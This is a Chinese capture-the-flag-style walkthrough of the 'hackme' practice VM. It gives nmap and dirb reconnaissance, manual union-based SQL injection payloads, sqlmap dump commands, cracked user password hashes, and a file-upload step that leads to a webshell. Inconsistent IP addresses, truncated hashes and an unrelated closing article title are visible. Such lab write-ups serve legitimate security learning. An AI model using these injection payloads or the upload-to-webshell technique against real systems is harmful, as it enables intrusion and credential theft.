靶机渗透
主机发现,查看统一网段下所有IP,寻找靶机IP地址,发信啊靶机IP地址为192.168.25.154
渗透过程
首先将hackme靶机和kali都设置为NAT网卡,然后查看靶机的物理地址
接着在kali里扫描nmap -sV 192.168.25.0/24 寻找同网段活跃的计算机,找到靶机IP地址
找到之后扫描nmap 192.168.25.154我们找到的靶机的IP的端口,寻找到22、80两个端口
通过dirb http://192.168.182.181命令查看80端口的详细目录,发现目录为upload
访问主页,发现有登陆页面并且可以注册
点击Sign Up now进入注册页面注册用户名为admin,密码为admin123
登陆admin用户,点击search可以查看全部
手工注入
验证sql注入 Windows OS' and 1=1# 页面回显正常
继续验证Windows OS' and 1=2 #页面回显异常
继续验证Windows OS' order by 3#,页面回显正常
输入Windows OS’order by 4#,页面回显异常
继续输入-1' union select 1,2,3 #,判断页面回显位置
查看库名-1' union select database(),user(),3#
查看表名-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查看字段名 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
查看表中user,password字段数据 -1' union select group_concat(user),group_concat(pasword),3 from users#
使用md5解码
user1 5d41402abc4b2a76b9719dc592 //hello
user2 6269c4f71a55b24bad0f0267d9be5508 //commando
user3 0fbd1cda994f8b55330c86d845 //p@ssw0rd
test 05a671c66aefea124cc08b76ea6d30bb //testtest
superadmin 2386acb2cf6fc // Uncrackable
test1 05a671c66aefea124cc08b76ea6d30bb //testtest
admin 0a7bbdf069df18b500 //admin123
工具查询
抓搜索包,在我们传值的后面加*,然后将请求包复制到与sqlmap同目录下的1111.txt文件中
然后进行baopo库名:python sqlmap.py -r 1111.txt --dbs --batch
表下数据:python sqlmap.py -r 1111.txt -D webapphacking --dump --batch
文件上传
使用superadmin用户登陆,密码:Uncrackable,发现文件上传功能点
上传phpinfo()进行验证:<?php phpinfo();?>
发现可以直接上传,存在上传漏洞
尝试上传一句话木马
尝试蚁剑连接
到此这篇nsenter进入网络空间(怎么进入network-scripts)的文章就介绍到这了,更多相关内容请继续浏览下面的相关推荐文章,希望大家都能在编程的领域有一番成就!版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若内容造成侵权、违法违规、事实不符,请将相关资料发送至xkadmin@xkablog.com进行投诉反馈,一经查实,立即处理!
转载请注明出处,原文链接:https://www.xkablog.com/rfx/40247.html